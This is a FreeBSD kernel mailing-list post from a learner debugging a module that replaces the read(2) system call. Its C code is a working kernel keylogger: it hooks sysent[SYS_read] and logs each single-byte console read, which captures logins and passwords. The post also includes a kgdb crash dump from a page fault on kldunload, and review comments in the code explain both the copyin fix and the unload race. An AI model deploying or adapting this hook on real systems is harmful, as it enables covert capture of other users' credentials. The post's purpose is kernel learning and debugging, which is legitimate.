KLM - Fatal trap 12 on kldunload mod - sc replace

Lukasz Jaroszewski sigtrm at gmail.com
Mon Jun 16 12:43:44 UTC 2008


Hi,
I am trying to learn the kernel; my first thought was to do a simple
replacement of a system call (read), though I have some issues which I
can't figure out. My read_hack is supposed to log keystrokes, and it
does -- though only the login and password typed at the console, and
without the first character (typing root appears as oot). Next, after
kldunload and changing tty, the system takes a ``fatal trap''. Here is
the code I use:
---------------------------cut--------------------------

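/*
 * read_hack - wrapper installed over sysent[SYS_read].sy_call.
 *
 * Runs the real read(2) handler first and then, for a successful
 * single-byte read from fd 0, logs the byte that landed in the caller's
 * buffer.  This is a keystroke logger; it belongs on a lab machine only.
 *
 * td           - calling thread (passed through to the real handler)
 * syscall_args - the struct read_args the syscall dispatcher hands us
 *
 * Returns whatever the real read handler returned.
 *
 * NOTE(review): why the posted version faults on kldunload.  A read on a
 * tty sleeps inside read() until a key arrives, so a thread (csh, pid
 * 1139 in the trap report) is very likely parked in the middle of this
 * function when MOD_UNLOAD runs and the module text is unmapped.  When
 * the key finally arrives the thread resumes at an address that no
 * longer exists -- the "page fault while in kernel mode" whose
 * instruction pointer equals the fault address.  Restoring sysent only
 * stops *new* callers; a safe unload must also wait for threads already
 * inside this hook (e.g. an in-flight counter incremented on entry and
 * decremented on exit, drained by the unload path) before the module
 * goes away.
 */
int
read_hack(struct thread *td, void *syscall_args)
{
        struct read_args *uap = (struct read_args *)syscall_args;
        char c;
        int error;

        /* Run the real system call first so the byte exists in user memory. */
        error = read(td, syscall_args);
        if (error != 0)
                return (error);

        /*
         * Only look at single-byte reads from fd 0 (what the original
         * filter accepted: nbyte == 1 and fd == 0).  Anything else is
         * passed through untouched.
         */
        if (uap->fd != 0 || uap->nbyte != 1)
                return (error);

        /*
         * read(2) can succeed with 0 bytes transferred (EOF); the user
         * buffer is then untouched and must not be reported as a key.
         * The byte count is the syscall's return value in td_retval[0].
         */
        if (td->td_retval[0] != 1)
                return (error);

        /*
         * copyin(9), not copyinstr(9): copyinstr expects a NUL-terminated
         * string and returns ENAMETOOLONG when no terminator fits in the
         * limit, which for a limit of 1 is every real keystroke.  The
         * original call therefore failed (unchecked) on each key and only
         * appeared to work because the copy loop stores the byte before
         * it notices the missing terminator.  uap->buf is a user pointer
         * that may be unmapped, so the return value must be checked
         * before c is used.
         */
        if (copyin(uap->buf, &c, sizeof(c)) != 0)
                return (error);

        log(LOG_INFO, "mex: %c\n", c);

        return (error);
}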

---------------------------cut---------------------

And in load() i do:

---------------------------cut---------------------
/*
 * load - module event handler for the read(2) hook.
 *
 * module - the kld being loaded/unloaded (unused)
 * cmd    - the module event (MOD_LOAD, MOD_UNLOAD, ...)
 * arg    - event argument (unused)
 *
 * Returns 0 for MOD_LOAD and MOD_UNLOAD, EOPNOTSUPP for every other
 * event.  (A non-forced kldunload first sends MOD_QUIESCE, and the
 * kernel treats EOPNOTSUPP from that event as "no objection", so the
 * default branch does not block unloading.)
 *
 * MOD_LOAD saves the real handler in oldsy and points sysent at
 * read_hack; MOD_UNLOAD puts oldsy back.
 *
 * NOTE(review): putting the pointer back only stops *new* callers.  A
 * thread already sleeping inside read_hack (a tty read waiting for a
 * keystroke) resumes in the module's text after it has been unmapped,
 * which matches the posted "Fatal trap 12" where the instruction
 * pointer equals the fault address.  A safe unload needs the hook to
 * maintain an in-flight counter and MOD_UNLOAD (or MOD_QUIESCE, by
 * returning EBUSY while the counter is non-zero) to refuse or wait
 * until that counter drops to zero before returning 0.  That counter
 * is not implemented in the code as posted.
 */
int
load(struct module *module, int cmd, void *arg)
{
        if (cmd == MOD_LOAD) {
                /* Remember the real handler so it can be put back later. */
                oldsy = sysent[SYS_read].sy_call;
                sysent[SYS_read].sy_call = (sy_call_t *)read_hack;
                return (0);
        }

        if (cmd == MOD_UNLOAD) {
                /* Restores the real handler; see the header comment. */
                sysent[SYS_read].sy_call = (sy_call_t *)oldsy;
                return (0);
        }

        /* Any other module event is not handled here. */
        return (EOPNOTSUPP);
}

---------------------------cut-------------------

After switching to another tty I get:

--------------------------------------------------------------------
# kgdb kernel.debug /var/crash/vmcore.5
[GDB will not be able to debug user-mode threads: /usr/lib/
libthread_db.so: Undefined symbol "ps_pglobal_lookup"]
GNU gdb 6.1.1 [FreeBSD]
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and
you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for
details.
This GDB was configured as "i386-marcel-freebsd".

Unread portion of the kernel message buffer:

Fatal trap 12: page fault while in kernel mode
cpuid = 0; apic id = 00
fault virtual address   = 0xc23f656e
fault code              = supervisor read, page not present
instruction pointer     = 0x20:0xc23f656e
stack pointer           = 0x28:0xcd63bc60
frame pointer           = 0x28:0xcd63bc80
code segment            = base 0x0, limit 0xfffff, type 0x1b
                        = DPL 0, pres 1, def32 1, gran 1
processor eflags        = interrupt enabled, resume, IOPL = 0
current process         = 1139 (csh)
panic: from debugger
cpuid = 0
Uptime: 34m47s
Physical memory: 234 MB
Dumping 37 MB: 22 6

#0  doadump () at pcpu.h:195
195             __asm __volatile("movl %%fs:0,%0" : "=r" (td));
(kgdb) wh

;;------below reformatted text, tr'ed escape chars which made frame

around it-------
pcpu.h
177                         : "=m" (*(struct __s *)
(__pcpu_offset(name)))       \
178                         :
"r" (__s));                                       \
179             } else
{                                                        \
180                     *__PCPU_PTR(name) =
__val;                              \
181             }
\
182     }
183
184     #define PCPU_GET(member)        __PCPU_GET(pc_ ## member)
185     #define PCPU_ADD(member, val)   __PCPU_ADD(pc_ ## member, val)
186     #define PCPU_INC(member)        __PCPU_INC(pc_ ## member)
187     #define PCPU_PTR(member)        __PCPU_PTR(pc_ ## member)
188     #define PCPU_SET(member, val)   __PCPU_SET(pc_ ## member, val)
189
190     static __inline struct thread *
191     __curthread(void)
192     {
193             struct thread *td;
194
195             __asm __volatile("movl %%fs:0,%0" : "=r" (td));
196             return (td);
197     }
198     #define curthread               (__curthread())
199
200     #else /* !lint || defined(__GNUCLIKE_ASM) &&
defined(__GNUCLIKE___TYPEOF) */
201
202     #error "this file needs to be ported to your compiler"
203
204     #endif /* lint, etc. */
205
206     #endif /* _KERNEL */
207
208     #endif /* !_MACHINE_PCPU_H_ */
209
210
211
212
213
214
;;-----------------------------------end of tr'ed
frame---------------------------------
kernel Thread 100076 In: doadump   Line: 195  PC: 0xc074f42c
Segmentation fault (core dumped)
                                #
# uname -a
FreeBSD  7.0-BETA3 FreeBSD 7.0-BETA3 #1: Sat Nov 24 11:19:31 UTC
2007     root@:/usr/obj/usr/src/sys/BSDKITCHEN  i386

I know it's a BETA, but I don't think that's the issue; I guess I am
doing something wrong. I would be grateful if anyone with the will and
time could explain where the layer-8 error is. :)

Best regards
LVJ

